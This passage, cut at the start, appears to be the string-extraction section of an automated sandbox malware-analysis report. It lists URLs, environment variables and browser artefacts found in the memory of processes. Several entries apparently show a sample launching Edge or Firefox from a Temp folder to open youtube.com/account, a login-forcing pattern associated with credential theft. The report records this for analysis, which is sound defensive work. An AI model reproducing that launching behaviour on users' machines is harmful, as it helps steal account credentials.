Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3299533997.000001A8A5D60000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000F.00000002.3032272020.000002B535160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevationj% equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000B.00000002.2991420610.0000027D5D6C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account_S equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3091318017.00000000086DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Temp\1008615041\C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com/account C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exewinsta0\defaultALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Microsoft\Edge\Application;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSExecutionPolicyPreference=RemoteSignedPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000B.00000002.2991420610.0000027D5D6C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Temp\1008615041\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account C:\Program Files\Mozilla Firefox\firefox.exewinsta0\default]S equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000F.00000002.3032272020.000002B535160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Defaultl% equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3299533997.000001A8A5D60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: FileUtils_closeSafeFileOutputStreamhttps://smartblock.firefox.etp/play.svg*://imasdk.googleapis.com/js/sdkloader/ima3.js*://ssl.google-analytics.com/ga.js*://www.googletagservices.com/tag/js/gpt.js*pictureinpicture%40mozilla.org:1.0.0*://static.chartbeat.com/js/chartbeat_video.js*://track.adform.net/serving/scripts/trackpoint/*://www.google-analytics.com/analytics.js*webcompat-reporter%40mozilla.org:1.5.1*://www.everestjs.net/static/st.v3.js**://connect.facebook.net/*/all.js**://static.chartbeat.com/js/chartbeat.js*://www.google-analytics.com/plugins/ua/ec.js@mozilla.org/addons/addon-manager-startup;1https://smartblock.firefox.etp/facebook.svg*://c.amazon-adsystem.com/aax2/apstag.js*://s0.2mdn.net/instream/html5/ima3.js*://*.imgur.com/js/vendor.*.bundle.js*://pub.doubleverify.com/signals/pub.js*FileUtils_closeAtomicFileOutputStreamwebcompat-reporter@mozilla.org.xpi*://cdn.branch.io/branch-latest.min.js**://auth.9c9media.ca/auth/main.js*://*.imgur.io/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.js*://static.criteo.net/js/ld/publishertag.js*://libs.coremetrics.com/eluminate.js*://web-assets.toggl.com/app/assets/scripts/*.js*://connect.facebook.net/*/sdk.js**://www.google-analytics.com/gtm/js**://www.googletagmanager.com/gtm.js*resource://services-settings/Database.sys.mjs equals www.facebook.com (Facebook)
Source: History.17.dr String found in binary or memory: Khttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3304423656.000001A8A841A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3304423656.000001A8A8380000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.3283065677.000001F42CAE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account5M equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account8WE equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000002.3283028567.0000029D55F60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountCSu equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.3283065677.000001F42CAEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountIM equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3282652339.000002B9C28B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountJ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3304423656.000001A8A841A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3029532362.000001A8A8425000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountl equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3360000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: chromecache_275.13.dr String found in binary or memory: _.Dq(p)+"/familylink/privacy/notice/embedded?langCountry="+_.Dq(p);break;case "PuZJUb":a+="https://www.youtube.com/t/terms?chromeless=1&hl="+_.Dq(m);break;case "fxTQxb":a+="https://youtube.com/t/terms?gl="+_.Dq(_.Mq(c))+"&hl="+_.Dq(d)+"&override_hl=1"+(f?"&linkless=1":"");break;case "prAmvd":a+="https://www.google.com/intl/"+_.Dq(m)+"/chromebook/termsofservice.html?languageCode="+_.Dq(d)+"&regionCode="+_.Dq(c);break;case "NfnTze":a+="https://policies.google.com/privacy/google-partners"+(f?"/embedded": equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3265309012.000001A8C0699000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3265309012.000001A8C0699000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: about:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B497E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000010.00000003.3262808062.000001A8C3D9C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3122177082.000001A8B89B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: getZOrderAppWindowEnumerator@mozilla.org/supports-PRUint64;1-*- UpdateBrowserIDHelper: _shouldViewDownloadInternally/<validateFileNameForSavingbrowsing-context-discardedbrowser-delayed-startup-finished@mozilla.org/browser/clh;1toolkit.singletonWindowTypeVALIDATE_NO_DEFAULT_FILENAMEPREF_BRANCH_PREVIOUS_ACTIONpreviousHandler.preferredAction.https://www.youtube.com/accountgetCurrentInnerWindowWithIdbrowser-open-homepage-startVALIDATE_ALLOW_INVALID_FILENAMES_shouldViewDownloadInternallytoolkit.defaultChromeFeaturesget isVideoDecodingSuspended equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&passive=true&service=youtube&uilel=3&ifkv=AcMMx-djIaRGV_oWtC_GcZw2kfAeE7zPLvpVpAemuw8UUzxDDeAm6H7o2uWjT74iA2PXKPXIZ87N8A equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&passive=true&service=youtube&uilel=3&ifkv=AcMMx-djIaRGV_oWtC_GcZw2kfAeE7zPLvpVpAemuw8UUzxDDeAm6H7o2uWjT74iA2PXKPXIZ87N8AYouTube equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&passive=true&service=youtube&uilel=3&ifkv=AcMMx-djIaRGV_oWtC_GcZw2kfAeE7zPLvpVpAemuw8UUzxDDeAm6H7o2uWjT74iA2PXKPXIZ87N8AYouTube/ equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GBYouTube equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GBYouTube/ equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AcMMx-f0Ki1dkMR8NUrH12cSsRPXXdvdv16fJwCXx6QqaRmryqWJMXp36Pxh8OCjHC3NFrZP06WloA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1308328676%3A1732418622661480&ddm=1 equals www.youtube.com (Youtube)
Source: Session_13376892216433120.17.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AcMMx-f0Ki1dkMR8NUrH12cSsRPXXdvdv16fJwCXx6QqaRmryqWJMXp36Pxh8OCjHC3NFrZP06WloA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1308328676%3A1732418622661480&ddm=1" equals www.youtube.com (Youtube)
Source: History.17.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AcMMx-f0Ki1dkMR8NUrH12cSsRPXXdvdv16fJwCXx6QqaRmryqWJMXp36Pxh8OCjHC3NFrZP06WloA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1308328676%3A1732418622661480&ddm=1YouTube equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B49B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3263352248.000001A8C37E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3330787150.000001A8B6F29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3255394267.000001A8B8DAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3264434250.000001A8C317B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B49B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/Get to a Wikipedia page fast, from anywhere on the web. Just highlight any webpage text and right-click to open the context menu to start a Wikipedia search. equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/Get to a Wikipedia page fast, from anywhere on the web. Just highlight any webpage text and right-click to open the context menu to start a Wikipedia search. equals www.twitter.com (Twitter)
